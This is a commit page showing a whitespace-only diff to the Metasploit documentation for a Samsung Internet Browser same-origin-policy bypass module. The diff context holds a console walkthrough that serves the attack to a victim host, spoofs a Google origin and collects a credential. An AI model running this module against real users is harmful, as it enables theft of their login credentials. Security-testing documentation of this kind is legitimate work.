Skip to content

Commit 8c1f169

Browse files
author
Tod Beardsley
committed
Kill trailing whitespace in docs
1 parent 4aa480d commit 8c1f169

File tree

1 file changed

+6
-6
lines changed

1 file changed

+6
-6
lines changed

documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -15,8 +15,8 @@ This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
1515

1616
## Scenarios
1717
```
18-
$ sudo msfconsole -q
19-
msf > use auxiliary/gather/samsung_browser_sop_bypass
18+
$ sudo msfconsole -q
19+
msf > use auxiliary/gather/samsung_browser_sop_bypass
2020
msf auxiliary(samsung_browser_sop_bypass) > set SRVHOST 192.168.1.104
2121
SRVHOST => 192.168.1.104
2222
msf auxiliary(samsung_browser_sop_bypass) > set SRVPORT 9090
@@ -27,7 +27,7 @@ msf auxiliary(samsung_browser_sop_bypass) > set TARGET_URL https://www.google.co
2727
TARGET_URL => https://www.google.com/csi
2828
msf auxiliary(samsung_browser_sop_bypass) > run
2929
[*] Auxiliary module execution completed
30-
msf auxiliary(samsung_browser_sop_bypass) >
30+
msf auxiliary(samsung_browser_sop_bypass) >
3131
[*] Using URL: http://192.168.1.104:9090/
3232
[*] Server started.
3333
[*] 192.168.1.101: Request 'GET /'
@@ -38,19 +38,19 @@ msf auxiliary(samsung_browser_sop_bypass) >
3838
[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
3939
[+] 192.168.1.101: Collected credential for 'https://www.google.com/csi' emailID:MyStrongPassword
4040
41-
msf auxiliary(samsung_browser_sop_bypass) > creds
41+
msf auxiliary(samsung_browser_sop_bypass) > creds
4242
Credentials
4343
===========
4444
4545
host origin service public private realm private_type
4646
---- ------ ------- ------ ------- ----- ------------
4747
emailID MyStrongPassword https://www.google.com/csi Password
4848
49-
msf auxiliary(samsung_browser_sop_bypass) >
49+
msf auxiliary(samsung_browser_sop_bypass) >
5050
```
5151

5252
## Demos
5353

54-
Working of MSF Module: `https://youtu.be/ulU98cWVhoI`
54+
Working of MSF Module: `https://youtu.be/ulU98cWVhoI`
5555

5656
Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`

0 commit comments

Comments
 (0)